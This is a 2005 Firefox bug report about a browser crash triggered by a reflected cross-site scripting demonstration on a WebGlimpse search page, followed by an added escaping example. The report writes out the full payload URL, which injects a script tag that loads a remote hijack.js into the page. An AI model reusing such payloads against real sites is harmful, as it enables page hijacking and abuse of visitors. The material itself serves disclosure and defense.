Closed Bug 301007 Opened 19 years ago Closed 19 years ago

Crashes Mozilla when URL loads

Categories

(Firefox :: General, defect)

x86
Windows 2000
defect
Not set
critical

VERIFIED WORKSFORME

People

(Reporter: mozilla, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4

The above URL is an exploit, demonstrating how an insecure search can be used to
hijack a webpage's content.  This exploit is with WebGlimpse, NOT Mozilla.  The
problem with Mozilla is that 75% of the time the browser crashes.

This has been seen on Windows 2000 and Windows 98.  Could someone with Deer Park
verify that this is still a problem?

The exploit has been reported to WebGlimpse, so I expect they will fix the above
URL soon.

Reproducible: Sometimes

Steps to Reproduce:
1. Click URL.

Actual Results:  
Mozilla usually crashes.

Expected Results:  
A page like this should have been displayed:
http://search.access.gpo.gov/usoge/SearchRight.asp?ct=usoge&q1=%3CSCRIPT+SRC%3D%27http%3A%2F%2Fneil.fraser.name%2Fnews%2F2005%2Fhijack.js%27%3E%3C%2FSCRIPT%3E&x=0&y=0

The script (http://neil.fraser.name/news/2005/hijack.js) executes this statement
to rewrite the entire page:
  document.body.innerHTML = text
where 'text' is the desired content.  This works on the 25 other pages I've
tested it on, but the WebGlimpse page seems to be different.

If someone could verify this bug and confirm its existence in Deer Park, I'll do
some work to isolate it with a minimal test case.  My crash ID is: TB7531346E
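The search-term reflection described in the report above, shown as an added example that is not part of the original bug or of WebGlimpse's code: the `q1` value from the quoted URL is rendered once as-is and once with output encoding. The results template and all function names are hypothetical.

```javascript
// Query string taken from the URL quoted in the report.
const REPORTED_QUERY =
  "ct=usoge&q1=%3CSCRIPT+SRC%3D%27http%3A%2F%2Fneil.fraser.name%2Fnews%2F2005%2Fhijack.js%27%3E%3C%2FSCRIPT%3E&x=0&y=0";

// Decode the search term the way a form handler would ('+' decodes to a space).
function searchTerm(queryString) {
  return new URLSearchParams(queryString).get("q1") ?? "";
}

// Escape the characters that are significant in HTML text and attribute values.
function escapeHtml(value) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Hypothetical results template, vulnerable form: the term is pasted into markup.
function renderUnsafe(term) {
  return `<p>Results for: ${term}</p>`;
}

// Same template with the term encoded on output, so it displays as text.
function renderSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Regression check for a template: render with the term, strip the known static
// wrapper, and report whether any raw markup character from the term survived.
function reflectsMarkup(render, term) {
  const html = render(term);
  const reflected = html.replace(/^<p>Results for: /, "").replace(/<\/p>$/, "");
  return /[<>]/.test(reflected);
}

// Run both templates against the reported query and summarise the outcome.
function demo() {
  const term = searchTerm(REPORTED_QUERY);
  return {
    term,
    unsafeReflects: reflectsMarkup(renderUnsafe, term),
    safeReflects: reflectsMarkup(renderSafe, term),
    safeHtml: renderSafe(term),
  };
}

console.log(demo());
```
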
No crash with WinXP.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050716
Firefox/1.0+ ID:2005071602

WFM - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b3) Gecko/20050713
Firefox/1.0+

wfm with Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.8b2) Gecko/20050701

marking wfm, please reopen if you can reproduce this with a recent Trunk build.


Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
Status: RESOLVED → VERIFIED